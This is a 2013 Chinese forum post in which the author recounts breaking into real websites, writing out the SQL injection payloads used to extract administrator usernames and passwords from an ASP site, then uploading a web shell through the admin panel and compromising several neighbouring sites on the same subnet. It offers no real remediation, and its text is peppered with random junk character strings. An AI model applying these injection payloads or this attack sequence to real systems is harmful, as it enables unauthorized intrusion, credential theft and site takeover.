发现一个注入点
/ V3 @/ k* P* K$ n$ M8 [% fhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
* p7 l7 `2 f7 x4 `! w/ e. |# M$ s1 R
习惯性的加’having1=1--' Y# n4 B i. N6 _% O% B7 Q9 F* ]
$ M0 w: p4 h6 k+ e& q! R c
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
]; e/ L& D! u% s6 P% t3 y: L
( b, T7 @/ a }6 j, B, S0! r$ l' [" L5 b8 p
0 C7 Y3 C2 F& y" t6 _, }) o. i
爆出Diary_A.dl_Title(这时候很激动啊); f( }& R4 P* Z4 `
- r9 G, t! N$ n1 q, H
那么继续' G5 g R6 R- S" f9 M8 _
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
( r Y. Q* ^3 o; K0 [$ W7 D
n0 w$ w2 i! K+ f7 e% I# I: J继续,一直爆下去; O2 k8 a# D1 J4 x8 ^
5 w7 B' `% m/ n5 g0 q爆到几个字段和表段 但是没找到需要的管理用户的字段
* F) \- W3 r8 o8 Q0 V* K! y
3 \( g7 X# L% _% T- y% n蛋疼了 怎么办 然后去后台登陆页看源码# f8 W8 Z1 a' m, d& Y7 d
5 n0 `$ [4 a$ H( w9 y/ A& q02 }+ o- l& a' [! X4 s: i
8 r. N+ p" x6 ^7 j+ q* rInput name= “ADUID”
2 N9 \& B- }; y$ T8 `Input name= “ADPWD”
% U6 ^ b1 {) x4 G0 Z: \# ~, @* @7 c ]1 T' B6 O
很幸运 找到了字段那就继续
l: C9 ?! b4 @7 S找到之后开始爆用户
; w( B2 r7 R4 q( y( u$ c* d8 q' chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—- m `$ h. F$ _. ^
爆密码& S7 |3 H! y- i. n
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
4 ]3 M1 z/ g- W测试了下 这个注入点只能爆到文章哪里的表
f6 t* w' P' A2 w2 t: x: _, c/ {4 f
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了# `$ B% M1 N4 F3 P5 o
, `, o7 V) R/ f6 G又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了; H5 R$ [1 B" V( C" W
5 O4 `1 v8 v- I8 f0 Y+ q473
1 e3 V: z. q. A1 }/ d, U8 _2 _8 Z( h) E% ~2 l6 R6 k' g8 D f
进后台
. g0 B3 y o7 w6 v& f$ g0 q' k2 _" h! j9 {+ F8 v" C
- G3 R) S( i$ M* P9 f' h' i7 e
发现几个上传点 有的地方不能上传 而且防止恶意代码
, `3 H$ t/ w q. ?7 U& `; h( ~, ?' Z) J/ A% J
没办法 各种百度各种找大牛 找到一只好像可以突破的马% H' ?! z1 ]8 `4 ?
. H* \9 N' m& Y: X+ @- P$ \8 M5 C8 u) g y0 x
在系统管理那里直接上传 不过没有显示地址
3 Y' F5 v6 c6 n ^ i; [( ?0 F7 [* B* d* S+ g* m
再上传一次 抓包 搞定OK
. D; b/ s0 @# o3 h; u0 m0 l" \3 r$ n, g' _: ]2 v2 z
1 u3 P+ C5 Y# a0 ^1 G& K; O* q1 w
! K' R" O0 B5 M
472
& M8 A5 q9 m7 y7 |8 f; Y
# s& O2 j5 m) d, S晚上不行了 去睡觉。。。& w# M! c# V' a
第二天刚起床 闲的没事做继续日站吧
3 n- ?" \+ C. m' R7 U" M: N
( I8 U+ Q( [3 C, P找个站 就把这个站的旁c扫了下- [' L" E2 }% ?3 [, `
" s9 M. v1 V2 L- N# N# }
发现c段也有一个购物站 ,然后还和这个站的模板差不多
f. z$ E& |3 N8 q0 B. q6 w( F& x$ ?% l2 o+ c5 f
就找到会员登录口测试
; w$ e) \& |0 X/ G0 Y- W1 ^6 {- m1 K- {; D. j9 S" d- U
'and (select top 1 MGR_UID from A_MGR)>0—& `5 o9 G; t& \: f2 d" \
果断爆到了 这时候我很激动 通杀
! v2 B& n7 d6 s1 O2 y
( |- G/ c) k8 w4 P5 }. z# h再次翻c段. _8 t5 e9 ]7 I, _$ d
( M& c9 K/ `, B) R1 f9 N: g% p翻出几个站 都成功拿下
, K6 Y- E& U6 P- ]5 U& a8 H; f% k- I( l- u* D
7 ^6 ?, [4 Q7 d8 ?$ D
& _1 U! p w* n$ h1 J修复方案:
6 s! D! g2 e6 x5 \0 R+ m他们比我专业 % I5 W/ P$ m5 t' d) u
" U7 c$ J0 ]+ U* D" G. G6 i5 _: r. ]4 I# o7 `3 t+ q
, A4 B) K9 {# o) u g |
发表于 2013-4-4 17:40:38
收藏
支持
反对